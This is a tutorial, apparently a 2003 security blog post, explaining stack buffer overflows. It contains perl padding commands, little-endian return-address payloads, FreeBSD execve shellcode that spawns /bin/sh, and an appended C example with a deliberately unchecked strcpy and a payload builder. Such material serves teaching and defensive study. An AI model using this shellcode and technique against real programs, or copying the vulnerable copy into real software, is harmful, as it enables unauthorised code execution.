Cipher

Buffer Overflows Tutorial

Posted in Articles by EK on August 12, 2003

If you are into IT security or hacking, whatever you call it, you have probably come across BOF, or buffer overflows.

In this article I will try to explain the basic idea behind it. I am not going into great detail, since there are plenty of texts out there that do that; I will just describe how this kind of bug works, with a small example.

Note: at the end of this article you will find a list of texts describing this technique in detail, with examples.

Every executable, once we run it, uses memory. Some memory regions hold data, others hold instructions, and others hold pointers into memory, for example the return addresses that the stack keeps for every function call so that the called function knows where to go back to.

Imagine the following :

we do : ./tool

next we get that :

Memory for this tool Starts --------------> 0x8048448
BLABLA
0x8048451 call 0x8048440 <f>
BLABLA
BLABLA
Memory for this tool Ends --------------> 0x804845a

As you can see, every execution has a start and an end. We will pay attention to what happens in between, where "tool" calls the function f. The call instruction saves the address of the instruction that follows it (the return address) on the stack, so that f knows where to continue when it finishes. If we could replace that saved return address with the address where we have loaded our own code, f would return into our code, and we could run anything we wanted during the execution of the application. (It is this saved address on the stack that we change, not the 0x8048440 inside the call instruction itself: the code segment is read-only.)

So, to change that address we need to overflow a buffer inside "tool" that lives on the stack, below the saved return address. Whatever we write past the end of the buffer overwrites the data stored after it, the saved return address included, and so we can point it at our code somewhere else in memory.

First of all, we need to find the point at which "tool" overflows, that is, how much input it accepts before it writes past the end of the buffer.

Let's imagine that there is a buffer in "tool", char data[10];, that is filled from user input during execution without any check on the length of that input.

Easy to imagine what we need to do to overflow that buffer, right?

1) Create an environment variable holding the padding: export BUFFER=`perl -e 'print "A" x 20'`

print "A" x 20 // This prints out the buffer we want to send

// Choose the length so that a) if you know the buffer size,
// it is at least twice as big, or b) if you don't know
// the buffer size, it is very big, e.g. print "A" x 2000

2) Send "tool" more data than the buffer holds: more than 10 bytes for char data[10]. In practice send well past the buffer, because the saved frame pointer and the return address sit some bytes after its end on the stack, and the exact distance depends on the compiler's layout; if the program does not crash, make the padding bigger.

How you pass the data depends on the software you want to exploit, e.g.

a) if the tool takes arguments from the command line, like this: ./tool arg[0] arg[1] ...

We can pass our buffer like this: ./tool "$BUFFER"

b) if the tool reads its input from stdin, like this: ./tool < file

We can do this: echo "$BUFFER" | ./tool, or write the buffer to a file first (perl -e 'print "A" x 20' > BUFFER.txt) and run ./tool < BUFFER.txt. (Note that ./tool < $BUFFER would not work: the shell would treat the A's as a file name to open.)

Now you need to see the following error after running the software, so you can be sure there is a buffer overflow at that spot:

[me@cipher]$ ./tool $BUFFER
Segmentation fault (core dumped)

A segmentation fault here means that we wrote past the end of the buffer and overwrote the saved return address: when the function returned, the CPU popped 0x41414141 into EIP and tried to fetch an instruction from that address, which is not mapped, so the kernel killed the process.

If we look at the registers with GDB (info registers after the crash, or on the core dump), we will see that EIP is 0x41414141 (0x41 is 'A' in ASCII), which confirms that our input replaced the return address saved by the call. A segmentation fault on its own can have other causes; EIP filled with our padding bytes is the check that we really control where execution resumes.

If we overflow "tool" with the address where we have loaded our own code, instead of A's, we can run whatever we want.

OK, it is a bit difficult to know the exact address our code ends up at inside "tool"'s input buffer, so we load our exploit code through an environment variable instead. We do that because we know where the environment variables start: they are copied to the top of the stack when the program starts, and on the systems of the time that was a fixed address from run to run. (On a modern system with address space randomisation the stack address changes on every run, and with a non-executable stack the code placed there would not run at all; this walkthrough assumes both are disabled.)

Let's say that the environment variable starts at 0xbffffb54.

If we want "tool" to jump into our code, we need to overflow "tool" using 0xbffffb54 as the value that lands on the saved return address.

So let's do that:
perl -e 'print "\x54\xfb\xff\xbf" x 20' > BUFFER.txt // "\x54\xfb\xff\xbf" is 0xbffffb54 written byte by byte, least significant byte first, as x86 stores it (0x54 is the printable character T)

If we do ./tool < BUFFER.txt, EIP will be 0xbffffb54 when the function returns, so we know it will execute our code. We repeat the address 20 times so that, whatever the exact distance between the buffer and the saved return address, one of the copies lands on it.

Let's load a SHELLCODE into the environment and put it all together:

[me@cipher]$ export BUFFER=`perl -e 'print
"\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50" .
"\x56\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff" .
"\x2f\x62\x69\x6e\x2f\x73\x68\x23"'`

[me@cipher]$ perl -e 'print "\x54\xfb\xff\xbf" x 20' > BUFFER.txt
[me@cipher]$ ./tool < BUFFER.txt
$

The new prompt ($) is the shell spawned by the shellcode. Shellcodes differ for each OS and architecture; the one above is for FreeBSD on 32-bit x86 (it calls execve, system call number 0x3b on FreeBSD i386, through int 0x80 to run /bin/sh). The 0xbffffb54 used here is only an example: find where the environment variable actually lands on your own system, for instance by printing its address under GDB, before building BUFFER.txt.
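To make the two steps above concrete, here is an added example in C (not code from the original article): a minimal "tool" with the char data[10] buffer described in the overflow procedure, a bounded version of the same copy that refuses over-long input, and a payload builder that repeats a little-endian return address the way perl -e 'print "\x54\xfb\xff\xbf" x 20' does. The function names, the buffer size and the address 0xbffffb54 are assumptions taken from the text; the real distance from the buffer to the saved return address depends on the compiler and platform, which is why the address is repeated rather than placed at a computed offset.

```c
/* Added example, not from the original article. Names, the buffer size and
 * the address 0xbffffb54 are assumptions taken from the text. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DATA_LEN 10          /* the article's char data[10] */

/* Vulnerable copy: strcpy stops only at the NUL terminator, so any input
 * longer than DATA_LEN - 1 bytes runs past data[] into the saved frame
 * pointer and the saved return address. With 0x41414141 ("AAAA") in the
 * return address, the function's ret jumps to an unmapped address and
 * the process dies with a segmentation fault. */
void vuln_copy(const char *src)
{
    char data[DATA_LEN];
    strcpy(data, src);               /* no length check */
    printf("got: %s\n", data);
}

/* Hardened copy: refuse input that does not fit instead of truncating it
 * silently. Returns 1 on success, 0 if the input was rejected. */
int safe_copy(const char *src, char *dst, size_t dst_len)
{
    size_t n = strlen(src);
    if (dst_len == 0 || n >= dst_len)
        return 0;
    memcpy(dst, src, n + 1);         /* n + 1 includes the NUL */
    return 1;
}

/* Build the overflow payload: `count` copies of `ret` as four little-endian
 * bytes, i.e. 54 fb ff bf for 0xbffffb54 on x86. Repeating the address is
 * what the article's "x 20" does: one copy will land on the saved return
 * address whatever its exact distance from the buffer. Returns the number
 * of bytes written, or 0 if out_len is too small. */
size_t build_payload(uint32_t ret, unsigned int count,
                     unsigned char *out, size_t out_len)
{
    if (out_len < (size_t)count * 4)
        return 0;
    for (unsigned int i = 0; i < count; i++) {
        out[i * 4 + 0] = (unsigned char)(ret & 0xff);
        out[i * 4 + 1] = (unsigned char)((ret >> 8) & 0xff);
        out[i * 4 + 2] = (unsigned char)((ret >> 16) & 0xff);
        out[i * 4 + 3] = (unsigned char)((ret >> 24) & 0xff);
    }
    return (size_t)count * 4;
}

int main(int argc, char **argv)
{
    unsigned char payload[80];
    size_t n = build_payload(0xbffffb54u, 20, payload, sizeof payload);
    printf("payload: %zu bytes, first four: %02x %02x %02x %02x\n",
           n, payload[0], payload[1], payload[2], payload[3]);

    char data[DATA_LEN];
    if (argc > 1) {
        if (!safe_copy(argv[1], data, sizeof data))
            fprintf(stderr, "rejected: argument longer than %d bytes\n",
                    DATA_LEN - 1);
        else
            printf("safe copy ok: %s\n", data);
        /* vuln_copy(argv[1]) is the crashing counterpart from the text;
         * run it only in a throwaway VM with ASLR and stack protection
         * disabled, e.g. ./tool "$BUFFER" with twenty A's in BUFFER. */
    }
    return 0;
}
```

Compiled as-is, the program only exercises the safe path; to reproduce the article's segmentation fault, replace the safe_copy call with vuln_copy(argv[1]) and pass an argument longer than the buffer, which is exactly the "./tool $BUFFER" step above. Note that the payload contains no 0x00 byte, which matters because strcpy would stop copying at the first NUL.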

The best tutorials on BOF:

Smashing The Stack For Fun And Profit (Aleph One, Phrack 49)
BOF with PERL
Stack Smashing Vulnerabilities
l0pht
